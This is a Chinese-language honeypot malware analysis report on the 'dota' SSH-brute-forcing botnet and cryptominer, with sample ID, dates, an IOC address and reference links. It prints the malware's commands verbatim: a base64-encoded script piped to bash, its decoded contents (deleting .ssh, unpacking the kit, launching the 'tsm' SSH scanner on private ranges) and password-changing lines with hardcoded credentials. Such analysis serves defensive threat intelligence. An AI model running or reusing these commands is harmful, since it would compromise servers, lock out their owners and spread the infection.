简述

dota样本是一个活跃多年的恶意样本族,通常使用凭据字典攻击SSH服务器,成功后,进行收集系统信息,持久化登录,劫持服务器资源等一系列行为,elkeid蜜罐于20221104收集到它的dota.tar.gz样本.

样本类型

僵尸网络,挖矿

elkeid 样本ID

elkeid_20221109_botnet_7

捕获时间

20221109

最近活跃时间

20221114

关键词

dota.tar.gz,X17-unix

已知入侵途径

  • 弱口令爆破

涉及样本

  • dota.tar.gz

主要行为

  • 收集系统信息

    • bash -c cat /proc/cpuinfo | grep model | grep name | wc -l
    • bash -c free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}
    • bash -c lscpu | grep Model

  • 执行

    • bash -c sleep 15s && cd /var/tmp; echo IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA= | base64 --decode | bash
    • 注:以下为decode内容:
    • #!/bin/bash
    • cd /tmp
    • rm -rf .ssh
    • rm -rf .mountfs
    • rm -rf .X13-unix
    • rm -rf .X17-unix
    • mkdir .X17-unix
    • cd .X17-unix
    • mv /var/tmp/dota.tar.gz dota.tar.gz
    • tar xf dota.tar.gz
    • sleep 3s && cd /tmp/.X17-unix/.rsync/c
    • nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
    • sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
    • sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1&
    • exit 0

  • 更改密码并保存至up.txt

    • bash -c echo dropbox\n0wE4NvqjqoFq\n0wE4NvqjqoFq\n|passwd > /tmp/up.txt
    • /bin/bash -c echo dropbox:dropbox | chpasswd

  • 初始化XMRig,并扫描网段

    • nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
    • sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&

IOC

  • 186.147.249.39

参考链接

  • dota3.tar.gz

https://www.countercraftsec.com/blog/dota3-malware-again-and-again/

  • dota.tar.gz

https://blog.edie.io/2020/10/31/honeypot-diaries-dota-malware/